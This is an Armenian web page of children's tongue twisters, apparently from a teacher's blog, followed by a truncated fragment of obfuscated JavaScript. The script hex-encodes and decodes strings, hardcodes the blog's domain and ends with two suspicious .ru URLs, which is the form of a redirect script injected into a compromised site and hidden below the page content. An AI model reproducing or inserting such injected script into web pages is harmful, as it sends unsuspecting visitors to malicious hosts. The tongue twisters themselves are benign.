Շուտասելուկներ

Ցոլակը ցատկեց
Ցից ցանկապատից,
Ցանկապատը ցնցվեց
Ցոլակի ցատկից:

***
Մուկը մատը մատին կտա,
Տան կարասը պատին կտա:

***

Ձուկը գցեմ ձուկը ուտեմ,
Մուկը գցեմ ձուկը ուտեմ:
***

Սանասա՛ր, սա լուսին է, իսկ սա՝ սար:

***

Մի փուչի՛կ փչիր. թռչում է՝ թող թռչի, չի թռչում՝ թող չթռչի:

***

.Սարի ուսին՝ սիրուն լուսին,
Սիրուն լուսին՝ սարի ուսին:

***

Մեր տան առաջ՝
Կանաչ կակաչ,
Կանաչ կակաչ՝
Մեր տան առաջ:

***
Զարթուցիչը ջեռուցիչից հեռու տար:

***
Կչկչան է ճուտը չալ,
Չալ է ճուտը կչկչան:

 

 

 

 

 

Երաժշտության ունկնդրում

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tatevmelqonyan.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://wek7ipqx359.ru/f2.html?a=19177https://lukpiot0dz.ru/u.html?a=19177